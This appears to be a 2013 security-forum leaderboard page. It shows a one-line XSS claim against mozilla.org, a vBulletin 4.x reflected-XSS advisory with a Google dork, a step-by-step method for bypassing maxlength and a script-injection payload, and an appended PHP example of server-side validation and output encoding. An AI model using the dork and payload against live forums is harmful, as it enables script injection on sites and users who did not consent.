Leaderboard

Popular Content

Showing content with the highest reputation on 09/04/13 in all areas

  1. # Exploit: *.mozilla.org - Cross-Site-Scripting Reflected
     # Author: akkiliON
     # URL Link: https://mozilla.org
     # PoC: Reported
    1 point
  2. After receiving several messages, I have decided to publish the vulnerabilities I found in vBulletin; some may be pleased, others not. This being my first exploit, I hope you like it. I say we spread the exploit and give RST a bit of publicity.

     ##########################################################################################
     # -#-#- vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities -#-#-
     # -#-#- RSTforums.com -#-#-
     #
     # • Exploit Title: vBulletin 4.x.x - Multiple Cross-Site-Scripting Vulnerabilities - Reflected
     # • Google Dork: "Powered by vBulletin® Version 4.x.x"
     # • Date: 13.08.2013
     # • Exploit Author: Sensi
     # • Website: RSTforums.com
     # • Software Link: http://vbulletin.com/
     # • Version: vBulletin 4.x.x
     # • Tested on: Linux & Windows
     # • Special thanks to: Kalash1337 (https://rstforums.com/forum/members/kalash1337/)
     #
     ##########################################################################################
     #
     # ### First XSS ###
     #
     # Step 1: Go to -> Any post -> Press Editpost (advanced editor) -> Inspect 'title' element source and delete maxlength="85"
     # (Direct Link:) http://localhost/[path]/editpost.php?p=[post number]&do=editpost
     #
     # Step 2: Add a malicious vector on title element.
     # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
     #
     #----------------------------------------------------------------------------------------
     #
     # ### Second XSS ###
     #
     # Step 1: Go to -> Any thread -> Press post new reply (advanced editor) -> Inspect 'title' element source and delete maxlength="85"
     # (Direct Link:) http://localhost/[path]/newreply.php?p=[post number]&noquote=1
     #
     # Step 2: Add a malicious vector on title element.
     # (Example:) sensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensisensi"><script>alert(/sensi @ RSTforums.com/);</script>
     #
     ##########################################################################################
     #
     # Author will not be responsible for any damage caused! User assumes all responsibility.
     #
     ##########################################################################################
    1 point
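
Both issues in the post above rely on the 85-character limit for `title` existing only as a `maxlength` attribute in the browser, and on the submitted value being echoed back into the page without encoding. A server-side counterpart, as an added example that is not vBulletin code (the function names and the sample input are constructed for illustration):

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not taken from vBulletin.
const TITLE_MAX_CHARS = 85; // the same limit the form declares via maxlength="85"

/**
 * Validate a submitted title on the server. Returns the cleaned title, or
 * throws when it exceeds the limit the browser was only asked to enforce.
 */
function validate_title(string $raw): string
{
    if (!mb_check_encoding($raw, 'UTF-8')) {
        throw new InvalidArgumentException('title is not valid UTF-8');
    }
    // Drop control characters, then trim surrounding whitespace.
    $title = trim(preg_replace('/[\x00-\x1F\x7F]/u', '', $raw) ?? '');
    if (mb_strlen($title, 'UTF-8') > TITLE_MAX_CHARS) {
        throw new LengthException('title exceeds ' . TITLE_MAX_CHARS . ' characters');
    }
    return $title;
}

/** Encode a value for use inside an HTML attribute or text node. */
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render the title field; the value is always encoded on output. */
function render_title_input(string $title): string
{
    return '<input type="text" name="title" maxlength="' . TITLE_MAX_CHARS
         . '" value="' . html_attr($title) . '">';
}

// Constructed input: 85 filler characters followed by markup, which is what
// a client can send once maxlength has been removed from the form.
$submitted = str_repeat('a', 85) . '"><script>alert(1)</script>';

try {
    validate_title($submitted);
} catch (LengthException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// If the form is redisplayed with the rejected value, encoding keeps the
// quote and angle brackets inside the attribute instead of closing it.
echo render_title_input($submitted), PHP_EOL;
```

The length check and the output encoding are independent controls: the first restores the limit the form advertises, the second is what stops the reflected value from being parsed as markup.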